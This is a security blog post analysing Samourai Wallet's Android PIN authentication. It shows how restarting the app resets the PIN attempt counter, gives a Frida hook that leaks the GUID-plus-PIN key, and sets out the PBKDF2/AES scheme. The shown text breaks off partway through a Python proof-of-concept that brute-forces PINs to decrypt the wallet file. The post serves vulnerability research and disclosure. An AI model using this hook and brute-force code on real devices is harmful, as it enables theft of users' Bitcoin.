<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="Samourai Wallet - Analysis of PIN Authentication &amp; Cryptographic Implementation" /><meta property="og:locale" content="en" /><meta name="description" content="Personal blog about computer hacking &amp; security" /><meta property="og:description" content="Personal blog about computer hacking &amp; security" /><link rel="canonical" href="https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/" /><meta property="og:url" content="https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/" /><meta property="og:site_name" content="vrls.ws" /><meta property="og:image" content="https://vrls.ws/assets/img/posts/2021/08/e39c5fa919fab8ecaff3daf62ff63080.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-08-04T00:00:00+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://vrls.ws/assets/img/posts/2021/08/e39c5fa919fab8ecaff3daf62ff63080.png" /><meta property="twitter:title" content="Samourai Wallet - Analysis of PIN Authentication &amp; Cryptographic Implementation" /><meta name="twitter:site" content="@joaovarelas" /><meta name="google-site-verification" content="0YWJ4u8OlxMr3LZJ6b0Yn3R1osX698vlYPd4esSdjls" /> <script type="application/ld+json"> {"description":"Personal blog about computer hacking &amp; security","url":"https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/","@type":"BlogPosting","image":"https://vrls.ws/assets/img/posts/2021/08/e39c5fa919fab8ecaff3daf62ff63080.png","headline":"Samourai Wallet - Analysis of PIN Authentication &amp; Cryptographic Implementation","dateModified":"2024-11-12T13:05:08+00:00","datePublished":"2021-08-04T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/"},"@context":"https://schema.org"}</script><title>Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation | vrls.ws</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="vrls.ws"><meta name="application-name" content="vrls.ws"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div class="site-title mt-3"> <a href="/">vrls.ws</a></div><div class="site-subtitle font-italic"></div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-user-tie ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a><li class="nav-item"> <a href="/contact/" class="nav-link"> <i class="fa-fw fas fa-phone-square ml-xl-3 mr-xl-3 unloaded"></i> <span>CONTACT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/joaovarelas" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/joaovarelas" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="https://linkedin.com/in/joaovarelas" aria-label="linkedin" class="order-5" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['joaomvarelas','gmail.com'].join('@')" aria-label="email" class="order-6" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-7" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Aug 4, 2021, 12:00 AM +0100" >Aug 4, 2021<i class="unloaded">2021-08-04T00:00:00+01:00</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Tue, Nov 12, 2024, 1:05 PM +0000" >Nov 12<i class="unloaded">2024-11-12T13:05:08+00:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1683 words">9 min read</span></div></div><div class="post-content"><p><img data-proofer-ignore data-src="/assets/img/posts/2021/08/e39c5fa919fab8ecaff3daf62ff63080.png" alt="image" /></p><h2 id="introduction">Introduction</h2><p>Samourai Wallet is a free and open source (FOSS), non custodial Bitcoin wallet software that focus on privacy and anonymity when interacting with the Bitcoin network. It is available as a mobile application compatible with Android devices and the package can be downloaded directly from the website under the name <a href="https://samouraiwallet.com/download/latest-apk">com.samourai.wallet</a> or you can find it on Google Play.</p><p>During this post, we will be looking into the PIN authentication mechanism and the underlying cryptographic implementation that protects the access to the application.</p><p>In addition, the project is licensed under the <a href="https://code.samourai.io/wallet/samourai-wallet-android/-/blob/develop/LICENSE">GNU General Public License v3.0</a>.</p><h2 id="motivation">Motivation</h2><p>When I was testing the application and created a Bitcoin wallet, I noticed that a new seed (BIP39 12-word mnemonic) was generated together with a custom passphrase. Besides that, a PIN was chosen to unlock the wallet. The PIN is a number in the range of 5 to 8 digits.</p><p>However, everytime the app was started, the only requirement to access and fully control the wallet was to introduce the PIN number. This behavior lead me to think about the following questions:</p><ul><li><em>Is the PIN number the only requirement to access the wallet?</em><li><em>The data on device internal memory is stored securely using encryption?</em><li><em>Can this data be decrypted with the PIN as a key?</em><li><em>What is the risk if someone gains control over the device and application data?</em><li><em>How safe are Bitcoins when using this wallet?</em></ul><p>To answer these questions we’ll dive into how the authentication and data encryption works on Samourai Wallet application.</p><h2 id="creating-a-new-wallet">Creating a new wallet</h2><p>The flow looks like this when starting the app for the first time:</p><p><img data-proofer-ignore data-src="/assets/img/posts/2021/08/a88a42371b2c5c10153cc6c78a229f8a.png" alt="image" /></p><p>After completing these steps, the wallet is created and we may access it as well as perform transactions, configure Whirlpool and other several features provided by the app.</p><h2 id="bypassing-login-attempts">Bypassing login attempts</h2><p>The first thing spotted was an error when introducing a wrong PIN while trying to login. The PIN will be the only requirement to use the application after creating or importing a wallet for the first time.</p><p><img data-proofer-ignore data-src="/assets/img/posts/2021/08/e90a87d6e2f9e148285dfb89f9cff06f.png" alt="image" /></p><p>We only have 3 attempts to authenticate. After the 3rd failure, the application will reset to its original state and require the passphrase to be introduced in order to unlock the wallet.</p><p>However, the PIN failure counter is stateless because the number of attempts is not preserved (except in the memory during runtime). The counter is a variable that increments whenever the wallet decryption fails.</p><p>To <strong>bypass</strong> the 3 PIN attempts we can simply <strong>restart the application</strong> and the counter will reset.</p><h2 id="reversing-the-application">Reversing the application</h2><p>How fast can we go if we intend to automate PIN testing? Testing each PIN one by one while restarting the app everytime is not feasible so we must find a way to automate this process.</p><p>Having a look at the source code:</p><div class="language-java highlighter-rouge"><div class="code-header"> <span text-data=" Java "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre><span class="k">try</span> <span class="o">{</span>
    <span class="n">HD_Wallet</span> <span class="n">hdw</span> <span class="o">=</span> <span class="nc">PayloadUtil</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="nc">PinEntryActivity</span><span class="o">.</span><span class="na">this</span><span class="o">)</span>
                                            <span class="o">.</span><span class="na">restoreWalletfromJSON</span><span class="o">(</span>
                                                <span class="k">new</span> <span class="nf">CharSequenceX</span><span class="o">(</span><span class="nc">AccessFactory</span>
                                            <span class="o">.</span>   <span class="n">getInstance</span><span class="o">(</span><span class="nc">PinEntryActivity</span><span class="o">.</span><span class="na">this</span><span class="o">)</span>
                                                <span class="o">.</span><span class="na">getGUID</span><span class="o">()</span> <span class="o">+</span> <span class="n">pin</span><span class="o">));</span> <span class="c1">// Interesting </span>

    <span class="n">runOnUiThread</span><span class="o">(()</span> <span class="o">-&gt;</span> <span class="o">{</span>
        <span class="n">progressBar</span><span class="o">.</span><span class="na">setVisibility</span><span class="o">(</span><span class="nc">View</span><span class="o">.</span><span class="na">INVISIBLE</span><span class="o">);</span>
    <span class="o">});</span>

    <span class="k">if</span> <span class="o">(</span><span class="n">hdw</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
        <span class="n">runOnUiThread</span><span class="o">(()</span> <span class="o">-&gt;</span> <span class="o">{</span>
            <span class="n">failures</span><span class="o">++;</span> <span class="c1">// Also interesting because we can hook the method </span>
                        <span class="c1">// during rt and force 'failures = 0'</span>
            <span class="nc">Toast</span><span class="o">.</span><span class="na">makeText</span><span class="o">(</span><span class="nc">PinEntryActivity</span><span class="o">.</span><span class="na">this</span><span class="o">,</span> <span class="nc">PinEntryActivity</span><span class="o">.</span><span class="na">this</span>
                            <span class="o">.</span><span class="na">getText</span><span class="o">(</span><span class="no">R</span><span class="o">.</span><span class="na">string</span><span class="o">.</span><span class="na">login_error</span><span class="o">)</span>
            <span class="o">+</span> <span class="s">":"</span> <span class="o">+</span> <span class="n">failures</span> <span class="o">+</span> <span class="s">"/3"</span><span class="o">,</span> <span class="nc">Toast</span><span class="o">.</span><span class="na">LENGTH_SHORT</span><span class="o">).</span><span class="na">show</span><span class="o">();</span>

            <span class="k">if</span> <span class="o">(</span><span class="n">failures</span> <span class="o">==</span> <span class="mi">3</span><span class="o">)</span> <span class="o">{</span>
                <span class="n">failures</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> 
                <span class="n">doBackupRestore</span><span class="o">();</span>
            <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
</pre></table></code></div></div><p>Code snippet from <em>com.samourai.wallet.PinEntryActivity</em> class. The failures variable is just an attribute in the class.</p><p>To brute force the PIN we must replicate what the method <em>PayloadUtil.restoreWalletFromJson()</em> is doing.</p><p>Also, the PIN rules are defined in <em>AccessFactory</em> class:</p><div class="language-java highlighter-rouge"><div class="code-header"> <span text-data=" Java "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nc">AccessFactory</span><span class="o">.</span><span class="na">MIN_PIN_LENGTH</span> <span class="o">=</span> <span class="mi">5</span><span class="o">;</span>
<span class="nc">AccessFactory</span><span class="o">.</span><span class="na">MAX_PIN_LENGTH</span> <span class="o">=</span> <span class="mi">8</span><span class="o">;</span>
</pre></table></code></div></div><p>Doing some quick maths, there are a total of <strong>10^5 + 10^6 + 10^7 + 10^8 = 111.100.000</strong> total possible PINs using digits from 0 to 9 with a length of 5, 6, 7 &amp; 8, respectively.</p><p>This is not an astronomic number. In fact, the PIN requirements are not even complex enough to be used in authentication.</p><h2 id="leveraging-frida-on-runtime">Leveraging Frida on runtime</h2><p>The key used to decrypt the wallet is passed as argument to <em>PayloadUtil.restoreWalletFromJson()</em> method and it is an object of type <em>CharSequenceX</em>.</p><p>To inspect what kind of value is being passed we can use Frida and hook that particular method to read the passed argument when calling. The following Frida script will leak the contents of <em>key = getGUID() + pin</em>:</p><div class="language-javascript highlighter-rouge"><div class="code-header"> <span text-data=" JavaScript "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="c1">// Frida script: hook_restoreWalletFromJson.js</span>
<span class="nx">Java</span><span class="p">.</span><span class="nx">perform</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="c1">// Import class</span>
    <span class="kd">var</span> <span class="nx">CharSequenceX</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">com.samourai.wallet.util.CharSequenceX</span><span class="dl">"</span><span class="p">;</span>
    <span class="kd">var</span> <span class="nx">PayloadUtil</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">com.samourai.wallet.payload.PayloadUtil</span><span class="dl">"</span><span class="p">);</span>
    
    <span class="c1">// Overload method</span>
    <span class="nx">PayloadUtil</span><span class="p">.</span><span class="nx">restoreWalletfromJSON</span><span class="p">.</span><span class="nx">overload</span><span class="p">(</span><span class="nx">CharSequenceX</span><span class="p">).</span><span class="nx">implementation</span> <span class="o">=</span>
        <span class="kd">function</span><span class="p">(</span><span class="nx">key</span><span class="p">){</span>
            <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Called restoreWalletFromJson()</span><span class="se">\n</span><span class="dl">"</span><span class="p">);</span>
            <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">key</span><span class="p">.</span><span class="nx">toString</span><span class="p">());</span>

            <span class="c1">// Continue the original call</span>
            <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nx">restoreWalletfromJSON</span><span class="p">(</span><span class="nx">key</span><span class="p">);</span>
        <span class="p">};</span>
<span class="p">});</span>
</pre></table></code></div></div><p>Running the following command will produce the output:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span text-data=" Shell "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nv">$ </span>frida <span class="nt">-U</span> <span class="nt">--no-pause</span> <span class="nt">-f</span> com.samourai.wallet <span class="nt">-l</span> hook_restoreWalletFromJson.js
Spawned <span class="sb">`</span>com.samourai.wallet<span class="sb">`</span><span class="nb">.</span> Resuming main thread!                    
<span class="o">[</span>Redmi 4A::com.samourai.wallet]-&gt; Called restoreWalletFromJson<span class="o">()</span>
b35b2502-541d-4de7-9c95-76fa1d09f668b28da911e4191079f2038a8a6ec978e4fc325fc012345
</pre></table></code></div></div><p>The key is a concatenation of GUID and PIN, i.e., <em>key = getGUID() + PIN</em>, such that:</p><ul><li><strong>GUID:</strong> b35b2502-541d-4de7-9c95-76fa1d09f668b28da911e4191079f2038a8a6ec978e4fc325fc0<li><strong>PIN:</strong> 12345</ul><p>According to <em>AccessFactory.getGUID()</em> method there are 3 versions of GUID (v2, v3 &amp; v4). In this release, the version 4 is being used for GUID so we may have a look at <em>FootprintUtil.getFootprintV4()</em>.</p><div class="language-java highlighter-rouge"><div class="code-header"> <span text-data=" Java "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="n">strFootprint</span> <span class="o">=</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MANUFACTURER</span> <span class="o">+</span> <span class="nc">Build</span><span class="o">.</span><span class="na">BRAND</span> <span class="o">+</span> <span class="nc">Build</span><span class="o">.</span><span class="na">MODEL</span> <span class="o">+</span> <span class="nc">Build</span><span class="o">.</span><span class="na">SERIAL</span><span class="o">;</span>
<span class="k">return</span> <span class="nf">RIPEMD160</span><span class="o">(</span><span class="n">strFootprint</span><span class="o">);</span>
</pre></table></code></div></div><p>In fact, the GUID is composed by <em>UUID.randomUUID()</em> and <em>FootprintUtil.getFootprintV4()</em> such that <em>guid = UUID.randomUUID().toString() + RIPEMD160(Build.MANUFACTURER + Build.BRAND + Build.MODEL + Build.SERIAL)</em></p><p>The GUID is static and stored in plaintext on device storage using Android Shared Preferences API (<em>/data/data/com.samourai.wallet/shared_prefs/com.samourai.wallet_preferences.xml</em>).</p><p>Having the GUID will allow us to concatenate an arbitrary PIN number and test every possible combination while trying to decrypt the Bitcoin wallet, but first, we must understand the decryption process.</p><p>Key derivation &amp; wallet decryption</p><p>Having a look at the driver method that decrypts wallet data:</p><div class="language-java highlighter-rouge"><div class="code-header"> <span text-data=" Java "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="kd">public</span> <span class="kd">synchronized</span> <span class="n">HD_Wallet</span> <span class="nf">restoreWalletfromJSON</span><span class="o">(</span><span class="nc">CharSequenceX</span> <span class="n">password</span><span class="o">){</span>
 <span class="nc">JSONObject</span> <span class="n">obj</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span>
        <span class="k">try</span> <span class="o">{</span>
            <span class="n">obj</span> <span class="o">=</span> <span class="n">deserialize</span><span class="o">(</span><span class="n">password</span><span class="o">,</span> <span class="kc">false</span><span class="o">);</span>
        <span class="o">}</span>
<span class="o">(...)</span>
<span class="k">return</span> <span class="nf">restoreWalletfromJSON</span><span class="o">(</span><span class="n">obj</span><span class="o">,</span><span class="kc">false</span><span class="o">);</span>
<span class="o">}</span>
</pre></table></code></div></div><p>And also:</p><div class="language-java highlighter-rouge"><div class="code-header"> <span text-data=" Java "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="kd">private</span> <span class="kd">synchronized</span> <span class="nc">JSONObject</span> <span class="nf">deserialize</span><span class="o">(</span><span class="nc">CharSequenceX</span> <span class="n">password</span><span class="o">,</span> <span class="kt">boolean</span> <span class="n">useBackup</span><span class="o">){</span>
    <span class="kd">private</span> <span class="kd">final</span> <span class="kd">static</span> <span class="nc">String</span> <span class="n">dataDir</span> <span class="o">=</span> <span class="s">"wallet"</span><span class="o">;</span>
    <span class="kd">private</span> <span class="kd">final</span> <span class="kd">static</span> <span class="nc">String</span> <span class="n">strFilename</span> <span class="o">=</span> <span class="s">"samourai.dat"</span><span class="o">;</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="n">jsonObj</span><span class="o">.</span><span class="na">getString</span><span class="o">(</span><span class="s">"payload"</span><span class="o">);</span>
<span class="o">(...)</span>
    <span class="k">try</span> <span class="o">{</span>
        <span class="k">if</span><span class="o">(</span><span class="n">version</span><span class="o">==</span><span class="mi">1</span><span class="o">){</span>
            <span class="n">decrypted</span> <span class="o">=</span> <span class="nc">AESUtil</span><span class="o">.</span><span class="na">decrypt</span><span class="o">(</span><span class="n">payload</span><span class="o">,</span> <span class="n">password</span><span class="o">,</span> <span class="nc">AESUtil</span><span class="o">.</span><span class="na">DefaultPBKDF2Iterations</span><span class="o">);</span>
        <span class="o">}</span><span class="k">else</span> <span class="k">if</span><span class="o">(</span><span class="n">version</span> <span class="o">==</span> <span class="mi">2</span><span class="o">){</span>
            <span class="n">decrypted</span> <span class="o">=</span> <span class="nc">AESUtil</span><span class="o">.</span><span class="na">decryptSHA256</span><span class="o">(</span><span class="n">payload</span><span class="o">,</span> <span class="n">password</span><span class="o">);</span>
        <span class="o">}</span>
<span class="o">(...)</span>
<span class="o">}</span>
</pre></table></code></div></div><p>From now on its pretty straightforward. By inspection we can assume it uses symmetric key encryption, in particular, AES-256-CBC. The version attribute has value 2 according to JSON object <strong>samourai.dat</strong> so it will call <em>AESUtil.decryptSHA256()</em> to perform decryption.</p><p>The method will create a new instance of KOpenSSL which is an implementation of cryptographic primitives in Kotlin and sets the value of <em>DefaultPBKDF2HMACSHA256Iterations</em>. In this case, PBKDF2 will force us to derive the correct key to use in decryption procedure by iterating 15.000 times (HMAC-SHA256).</p><p>Iterations have a computational cost, however, the current value is not significant enough given the weak password complexity (5 to 8 digit PIN number). For reference, 1Password software is currently using 100.000 iterations for key derivation.</p><p>In resume, the full decryption procedure is the following:</p><ol><li>User input PIN<li>Key = GUID + PIN<li>Open “samourai.dat” file<li>Read “payload” attribute<li>Derive AES key using PBKDF2-HMAC-SHA256 (15.000 iters)<li>Perform AES decryption of payload (ciphertext) using the derived key</ol><h2 id="python-proof-of-concept">Python Proof-of-Concept</h2><div class="language-python highlighter-rouge"><div class="code-header"> <span text-data=" Python "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">json</span><span class="p">,</span> <span class="n">hashlib</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64decode</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">unpad</span>

<span class="s">''' Load our payload in base64 from "samourai.dat" '''</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"samourai.dat"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">samourai</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">samourai</span><span class="p">[</span><span class="s">"payload"</span><span class="p">])</span>

<span class="s">''' Try PIN combinations (must use "zfill" to test left zeros) '''</span>
<span class="s">''' The correct PIN for this demo is "12345" (~30 seconds for 300 tries) '''</span>
<span class="n">START</span> <span class="o">=</span> <span class="mi">12000</span>
<span class="n">END</span> <span class="o">=</span> <span class="mi">12999</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">START</span><span class="p">,</span> <span class="n">END</span><span class="p">):</span>
    <span class="n">pin</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">pin</span><span class="p">)</span>
    
    <span class="s">''' Salt for key derivation (8 payload/ciphertext bytes from 8 to 16) '''</span>
    <span class="n">salt</span> <span class="o">=</span> <span class="n">payload</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">16</span><span class="p">].</span><span class="nb">hex</span><span class="p">()</span> <span class="c1"># "1c5690f5acb17d4f"
</span>        
    <span class="s">''' Password (GUID + PIN) (Can be recovered from "shared_preferences.xml" or Frida) '''</span>
    <span class="n">password</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"b35b2502-541d-4de7-9c95-76fa1d09f668b28da911e4191079f2038a8a6ec978e4fc325fc0"</span> <span class="o">+</span> <span class="n">pin</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
    
    <span class="n">iters</span> <span class="o">=</span> <span class="mi">15000</span>

    <span class="n">pbkdf2_hmac_key</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">pbkdf2_hmac</span><span class="p">(</span><span class="s">'sha256'</span><span class="p">,</span>
                                      <span class="n">password</span><span class="p">,</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">salt</span><span class="p">),</span>
                                      <span class="n">iters</span><span class="p">,</span>
                                      <span class="n">dklen</span><span class="o">=</span><span class="mi">256</span><span class="p">)</span>
    <span class="s">''' 32 bytes '''</span>
    <span class="n">key</span> <span class="o">=</span> <span class="n">pbkdf2_hmac_key</span><span class="p">.</span><span class="nb">hex</span><span class="p">()[:</span><span class="mi">64</span><span class="p">]</span>

    <span class="s">''' 16 bytes '''</span>
